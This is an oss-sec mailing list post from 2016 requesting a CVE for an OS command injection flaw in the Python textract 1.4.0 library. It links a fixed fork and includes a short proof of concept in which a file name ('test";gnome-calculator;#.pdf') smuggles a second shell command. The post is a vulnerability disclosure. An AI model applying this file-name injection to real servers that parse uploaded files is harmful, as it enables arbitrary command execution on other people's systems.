oss-sec mailing list archives

CVE request - textract 1.4.0 - OS Command Injection

From: Pierre Ernst <pernst () salesforce com>
Date: Thu, 20 Oct 2016 17:40:50 -0400

The Python textract component (
https://github.com/deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS
command injection.

this fork contains a fix:
https://github.com/pierre-ernst/textract


Parsing a file with a malicious name leads to arbitrary OS command
injection, this is especially risky when parsing user-supplied files on a
server (e.g. uploaded files)

PoC:

import textract
import sys
import os

# create a file with a malicious name and arbitrary content
fileName = './test";gnome-calculator;#.pdf'
file = open(fileName,'w+')
file.write('Pierre Ernst, Salesforce')
file.close()

# parse newly created file
text = textract.process(fileName)
print text

# cleanup
os.remove(fileName);


-- 
Pierre Ernst
Salesforce

Current thread:

CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Oct 20)
- Re: CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Nov 17)